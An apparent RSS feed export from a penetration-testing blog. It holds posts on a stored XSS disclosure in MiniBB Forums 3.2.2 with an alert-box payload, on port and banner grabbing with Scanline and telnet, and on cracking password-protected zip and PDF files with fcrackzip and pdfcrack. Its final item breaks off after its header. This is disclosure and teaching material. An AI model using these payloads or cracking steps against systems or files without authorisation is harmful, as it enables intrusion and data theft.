<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Penetration Testing</title>
	<atom:link href="https://offensivehacking.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://offensivehacking.wordpress.com</link>
	<description>SECURITY........THE OFFENSIVE WAY!!!!</description>
	<lastBuildDate>Thu, 08 Feb 2018 09:48:02 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<site xmlns="com-wordpress:feed-additions:1">41081597</site><cloud domain='offensivehacking.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>https://s2.wp.com/i/webclip.png</url>
		<title>Penetration Testing</title>
		<link>https://offensivehacking.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="https://offensivehacking.wordpress.com/osd.xml" title="Penetration Testing" />
	<atom:link rel='hub' href='https://offensivehacking.wordpress.com/?pushpress=hub'/>
	<item>
		<title>MiniBB Forums v3.2.2 &#8211; Stored XSS</title>
		<link>https://offensivehacking.wordpress.com/2018/02/07/minibb-forums-v3-2-2-stored-xss/</link>
					<comments>https://offensivehacking.wordpress.com/2018/02/07/minibb-forums-v3-2-2-stored-xss/#respond</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Wed, 07 Feb 2018 18:35:11 +0000</pubDate>
				<category><![CDATA[OTHER]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=137</guid>

					<description><![CDATA[Hey Guys, I have found Stored Cross Site Scripting Vulnerability in MiniBB Forums Software ( v3.2.2) Description: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2018/02/07/minibb-forums-v3-2-2-stored-xss/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hey Guys,</p>
<p>I have found Stored Cross Site Scripting Vulnerability in MiniBB Forums Software ( v3.2.2)</p>
<p><strong>Description:</strong></p>
<p>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.</p>
<p>An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.</p>
<p><strong>Severity: High</strong></p>
<p><strong>POC:</strong></p>
<p>Steps to reproduce:</p>
<ol>
<li>Login into Administrative Panel of MiniBB application. Click on Add Forum.</li>
<li>Enter below XSS payload in supertitle field</li>
</ol>
<p>Payload: &lt;sVg/oNloAd=alert(&#8220;xss&#8221;)//&gt;</p>
<ol start="3">
<li>Next, click on Add Forum button. The forum gets successfully added.</li>
<li>When any user visits the Forums (homepage), our XSS payload gets executed as shown in below screenshot.</li>
</ol>
<p>Screenshot:</p>
<p><img data-attachment-id="140" data-permalink="https://offensivehacking.wordpress.com/2018/02/07/minibb-forums-v3-2-2-stored-xss/attachment/4/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png" data-orig-size="869,576" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="4" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png?w=584" class="alignnone size-full wp-image-140" src="https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png?w=584" alt="4"   srcset="https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png 869w, https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png?w=150&amp;h=99 150w, https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png?w=300&amp;h=199 300w, https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png?w=768&amp;h=509 768w" sizes="(max-width: 869px) 100vw, 869px" /></p>
<p>The vulnerability will be patched in next version of MiniBB Forums Software i.e v.3.3</p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
<p><strong> </strong></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2018/02/07/minibb-forums-v3-2-2-stored-xss/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">137</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2018/02/4.png" medium="image">
			<media:title type="html">4</media:title>
		</media:content>
	</item>
		<item>
		<title>Banner Grabbing and Port Scanning using Scanline</title>
		<link>https://offensivehacking.wordpress.com/2013/12/18/banner-grabbing-and-port-scanning-using-scanline/</link>
					<comments>https://offensivehacking.wordpress.com/2013/12/18/banner-grabbing-and-port-scanning-using-scanline/#respond</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Wed, 18 Dec 2013 12:05:38 +0000</pubDate>
				<category><![CDATA[BANNER GRABBING]]></category>
		<category><![CDATA[banner grabbing]]></category>
		<category><![CDATA[portscanning]]></category>
		<category><![CDATA[scanline]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=130</guid>

					<description><![CDATA[Hello Friends, In our previous post,we saw how to grab the banner of a  particular port of the target machine using simple TELNET utility. In this tutorial, we are going to use the advanced windows based tool for grabbing the banner. With this tool,we can grab the banners of all the open ports in one &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/12/18/banner-grabbing-and-port-scanning-using-scanline/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hello Friends,</p>
<p>In our previous post,we saw how to grab the banner of a  particular port of the target machine using simple TELNET utility.</p>
<p>In this tutorial, we are going to use the advanced windows based tool for grabbing the banner. With this tool,we can grab the banners of all the open ports in one stroke! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230;The tools works as follows:-</p>
<p>1. Scanline scans our target for all the open ports (TCP as well as UDP).</p>
<p>2. Once all the open ports are identified, it grabs the banner of these individual ports and displays it!</p>
<p>Amazing! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>You can download this tools here:</p>
<p><a href="http://b2b-download.mcafee.com/products/tools/foundstone/scanline.zip" rel="nofollow">http://b2b-download.mcafee.com/products/tools/foundstone/scanline.zip</a></p>
<p>Ok&#8230;.So&#8230;let&#8217;s grab the banner of our target! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Our target:192.168</p>
<p>1.Extract scanline.zip in &#8216;C:&#8217; drive or whichever drive you wish to! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>2. Open command prompt.</p>
<p>3. Navigate to the directory in which you extracted scanline.zip</p>
<p>4. Type the following command</p>
<p>sl  -v -b [your-target-ip-address]</p>
<p>Eg: sl -v -b 192.168.56.102</p>
<p>5.Hit Enter key.</p>
<p>This is what we get&#8230;</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/12/bannersl.png"><img data-attachment-id="131" data-permalink="https://offensivehacking.wordpress.com/2013/12/18/banner-grabbing-and-port-scanning-using-scanline/bannersl/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/12/bannersl.png" data-orig-size="643,496" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="bannersl" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/12/bannersl.png?w=584" class="alignnone  wp-image-131" alt="bannersl" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/12/bannersl.png?w=500&#038;h=400" width="500" height="400" /></a></p>
<p>WHoaaaaaa!!!!! Fantastic!</p>
<p>WE GOT ALL THE OPEN PORTS with THEIR BANNERS EXPOSED&#8230;.LOADS OF INFORMATION EXPOSED!</p>
<p>Amazing!</p>
<p>That&#8217;s all for this post&#8230;</p>
<p>Thank you! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/12/18/banner-grabbing-and-port-scanning-using-scanline/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">130</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/12/bannersl.png?w=300" medium="image">
			<media:title type="html">bannersl</media:title>
		</media:content>
	</item>
		<item>
		<title>HTTP Banner Grabbing using TELNET</title>
		<link>https://offensivehacking.wordpress.com/2013/11/04/http-banner-grabbing-using-telnet/</link>
					<comments>https://offensivehacking.wordpress.com/2013/11/04/http-banner-grabbing-using-telnet/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Mon, 04 Nov 2013 05:43:22 +0000</pubDate>
				<category><![CDATA[BANNER GRABBING]]></category>
		<category><![CDATA[80]]></category>
		<category><![CDATA[banner grabbing]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[IIS server]]></category>
		<category><![CDATA[telnet]]></category>
		<category><![CDATA[vulnerabilities]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=117</guid>

					<description><![CDATA[Hello Folks, This is a very new post on &#8220;Banner Grabbing&#8221;.  The idea is&#8230;. We will try to grab the banner hosted by the HTTP protocol on target system! Now what do we get??? Let&#8217;s see! Step 1: Boot up your Backtrack machine. Step 2: Identify the IP address of target machine. (In my case &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/11/04/http-banner-grabbing-using-telnet/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hello Folks,</p>
<p>This is a very new post on &#8220;Banner Grabbing&#8221;.  The idea is&#8230;. We will try to grab the banner hosted by the HTTP protocol on target system!</p>
<p>Now what do we get???</p>
<p>Let&#8217;s see!</p>
<p>Step 1: Boot up your Backtrack machine.</p>
<p>Step 2: Identify the IP address of target machine. (In my case it happens to be 192.168.56.102).</p>
<p>Step 3: Invoke your shell( terminal).</p>
<p>Step 4:  Type the following command:-</p>
<p>telnet  [target-ip address]   [port no].</p>
<p>WELL, since we are doing HTTP banner grabbing, port no is 80 and target IP is 192.168.56.102</p>
<p>Let us see what we get:&#8212;&gt;</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/11/port-80.png"><img data-attachment-id="118" data-permalink="https://offensivehacking.wordpress.com/2013/11/04/http-banner-grabbing-using-telnet/port-80/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/11/port-80.png" data-orig-size="800,349" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="port 80" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/11/port-80.png?w=584" class="alignnone  wp-image-118" alt="port 80" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/11/port-80.png?w=800&#038;h=400" width="800" height="400" /></a></p>
<p>Interesting&#8230;.!</p>
<p>Now Vital inference that we can draw from the output of the command is the type of Server that the target machine has.</p>
<p>In this case it happens to be MICROSOFT IIS 5.1 server!!!</p>
<p>Now if you just search on google what vulnerabilities and exploits does IIS Server 5.1 have&#8230;..you will be astonished!!</p>
<p>So&#8230;in short we identified the server type of the target machine&#8230;.which we can be used to find exploits related to it and can be easily compromised! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>SO&#8230;.BINGO!! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Loads more to come! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Thankkksss a ton!  <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/11/04/http-banner-grabbing-using-telnet/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">117</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/11/port-80.png?w=300" medium="image">
			<media:title type="html">port 80</media:title>
		</media:content>
	</item>
		<item>
		<title>Cracking Password Protected Zip Files</title>
		<link>https://offensivehacking.wordpress.com/2013/06/10/cracking-password-protected-zip-files/</link>
					<comments>https://offensivehacking.wordpress.com/2013/06/10/cracking-password-protected-zip-files/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Mon, 10 Jun 2013 17:27:28 +0000</pubDate>
				<category><![CDATA[GAINING ACCESS]]></category>
		<category><![CDATA[PASSWORD CRACKING]]></category>
		<category><![CDATA[attacks]]></category>
		<category><![CDATA[bruteforce]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[dictionary]]></category>
		<category><![CDATA[dictionary file]]></category>
		<category><![CDATA[fcrackzip]]></category>
		<category><![CDATA[password cracking techniques]]></category>
		<category><![CDATA[password protected zip file]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=109</guid>

					<description><![CDATA[HELLO ALL, In the previous tutorial Cracking PDF files, we saw how to crack password protected PDF files using pdfcrack . Basically,we demonstrated a password cracking technique called as BRUTEFORCE  attack! In this tutorial, we will see how to crack zip files using dictionary based attack. 🙂 For this, we will be using BACKTRACK OS &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/06/10/cracking-password-protected-zip-files/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>HELLO ALL,</p>
<p>In the previous tutorial<a href="https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/"> Cracking PDF files</a>, we saw how to crack password protected PDF files using pdfcrack .</p>
<p>Basically,we demonstrated a password cracking technique called as BRUTEFORCE  attack!</p>
<p>In this tutorial, we will see how to crack zip files using dictionary based attack. <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>For this, we will be using BACKTRACK OS and an in-built tool known as fcrackzip! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230; LET&#8217;S START!</p>
<p>We are having confidential.zip as the target zip file which is password protected!</p>
<p>LET US CRACK THE PASSWORD OF THIS FILE!</p>
<p>Step 1: Boot in your Backtrack OS.</p>
<p>step 2: Invoke a terminal using Cltr-Alt-T key combination or by simply clicking on shell icon!</p>
<p>Step 3:  Syntax of the command is &#8221; fcrackzip -Dp [your-dictionary-file-name with the path] [target-zip-file]&#8221;</p>
<p>( We have our confidential.zip file in the root directory)</p>
<p>Our target file in this case is confidential.zip</p>
<p>And our dictionary file is passwords.lst</p>
<p>Step 4: So we type in &#8221; fcrackzip -Dp passwords.lst confidential.zip (HIT ENTER)</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/fcrack.jpg"><img loading="lazy" data-attachment-id="111" data-permalink="https://offensivehacking.wordpress.com/2013/06/10/cracking-password-protected-zip-files/fcrack/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/fcrack.jpg" data-orig-size="1487,706" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="fcrack" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/fcrack.jpg?w=584" class="alignnone  wp-image-111" alt="fcrack" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/fcrack.jpg?w=800&#038;h=500" width="800" height="500" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>AWESOMEEEEEEE!! We Found the password as &#8220;google&#8221; WITHIN NO TIME!</p>
<p>That&#8217;s great,isn&#8217;t it?????</p>
<p>&nbsp;</p>
<p>I strongly recommend you to kindly explore all the options of &#8220;fcrackzip&#8221; using following command :</p>
<p>fcrackzip -h (HIT ENTER)</p>
<p>You may notice that fcrackzip also supports BRUTEFORCE attacks, trying using it! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>&nbsp;</p>
<p>NOTE: If you are not using backtrack, you can download fcrackzip using following command:</p>
<p>sudo apt-get install fcrackzip (HIT ENTER)</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>SO&#8230;..That is it for this tutorial&#8230; <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>&nbsp;</p>
<p>HOPE YOU ENJOYED IT! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>THANKS! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/06/10/cracking-password-protected-zip-files/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">109</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/fcrack.jpg?w=614" medium="image">
			<media:title type="html">fcrack</media:title>
		</media:content>
	</item>
		<item>
		<title>Cracking Password-Protected PDF Documents</title>
		<link>https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/</link>
					<comments>https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Tue, 04 Jun 2013 08:43:43 +0000</pubDate>
				<category><![CDATA[PASSWORD CRACKING]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[bruteforce]]></category>
		<category><![CDATA[linux cracking]]></category>
		<category><![CDATA[passwords.pdf hacking.]]></category>
		<category><![CDATA[pdf cracking]]></category>
		<category><![CDATA[pdfcrack]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=98</guid>

					<description><![CDATA[Hello buddies&#8230; In the very previous post we saw some password cracking techniques&#8230;In case,if you have not gone through it, it is recommended that you go through it once! Here is the link: Click here Now we are going to break the password of a PDF File&#8230; We are going to use LINUX operating system &#8230; &#8230; <a href="https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<p>Hello buddies&#8230;</p>
<p>In the very previous post we saw some password cracking techniques&#8230;In case,if you have not gone through it, it is recommended that you go through it once!</p>
<p>Here is the link: <a href="https://offensivehacking.wordpress.com/2013/06/03/password-cracking-techniques/" target="_blank">Click here</a></p>
<p>Now we are going to break the password of a PDF File&#8230;</p>
<p>We are going to use LINUX operating system for this ( I am using Backtrack 5 R3, my favorite OS)! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>Step 1: Install Linux OS in your system or you may use Virtual box also!</p>
<p>Step 2: Invoke a shell by pressing &#8220;Ctrl-Alt-T&#8221; key combination or my simply clicking on shell icon!</p>
<p>Step 3: We will use linux-based tool called &#8220;pdfcrack&#8221; here. Install it by typing &#8220;sudo apt-get install pdfcrack&#8221;. Hit enter.</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/screenshot.png"><img loading="lazy" data-attachment-id="99" data-permalink="https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/screenshot/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/screenshot.png" data-orig-size="1600,900" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="Screenshot" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/screenshot.png?w=584" class="alignnone  wp-image-99" alt="Screenshot" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/screenshot.png?w=800&#038;h=500" width="800" height="500" /></a></p>
<p>Step 4: Installation will proceed. Say &#8220;yes&#8221; when prompted to continue installation.</p>
<p>Step 5: After installation type &#8221; pdfcrack  [your-target-file] &#8221; and hit enter.</p>
<p>For Eg: if your target pdf file is test.pdf. You need to type &#8221; pdfcrack test.pdf&#8221; (without quotes ofcourse) and hit enter key.</p>
<p><a href="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/untitled1.png"><img loading="lazy" data-attachment-id="102" data-permalink="https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/untitled-2/" data-orig-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/untitled1.png" data-orig-size="1585,706" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}" data-image-title="Untitled" data-image-description="" data-image-caption="" data-large-file="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/untitled1.png?w=584" class="alignnone  wp-image-102" alt="Untitled" src="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/untitled1.png?w=800&#038;h=500" width="800" height="500" /></a></p>
<p>WHOILAAAAAA!!! We got the password as  &#8220;test&#8221; (encircled)! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f600.png" alt="😀" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>As you can see that pdfcrack was trying combination of characters and attempting to test it as the password. So this is a characteristic of  &#8220;BRUTEFORCE&#8221; attack!</p>
<p>NOTE: BRUTEFORCE ATTACKS are always successful. The only way you can mitigate this is by using strong and long password. Nevertheless, it can only prolong the attack and not stop it completely! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f61b.png" alt="😛" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>So&#8230;. I hope you really enjoyed this tutorial! Stay tuned! New tutorials coming soon! <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>THANKS!  <img src="https://s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji/2/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://offensivehacking.wordpress.com/2013/06/04/cracking-password-protected-pdf-documents/feed/</wfw:commentRss>
			<slash:comments>6</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98</post-id>
		<media:content url="https://0.gravatar.com/avatar/f9b2f6b1746c568184dbc2a3253de7646588c9fa142f47c3defe2c96ab7b330d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kshitijkhakurdikar</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/screenshot.png?w=614" medium="image">
			<media:title type="html">Screenshot</media:title>
		</media:content>

		<media:content url="https://offensivehacking.wordpress.com/wp-content/uploads/2013/06/untitled1.png?w=614" medium="image">
			<media:title type="html">Untitled</media:title>
		</media:content>
	</item>
		<item>
		<title>Password Cracking Techniques</title>
		<link>https://offensivehacking.wordpress.com/2013/06/03/password-cracking-techniques/</link>
					<comments>https://offensivehacking.wordpress.com/2013/06/03/password-cracking-techniques/#comments</comments>
		
		<dc:creator><![CDATA[offensivehacking]]></dc:creator>
		<pubDate>Mon, 03 Jun 2013 14:00:43 +0000</pubDate>
				<category><![CDATA[PASSWORD CRACKING]]></category>
		<category><![CDATA[bruteforce]]></category>
		<category><![CDATA[dictionary]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[hashing]]></category>
		<category><![CDATA[password cracking]]></category>
		<category><![CDATA[secure]]></category>
		<guid isPermaLink="false">http://offensivehacking.wordpress.com/?p=96</guid>

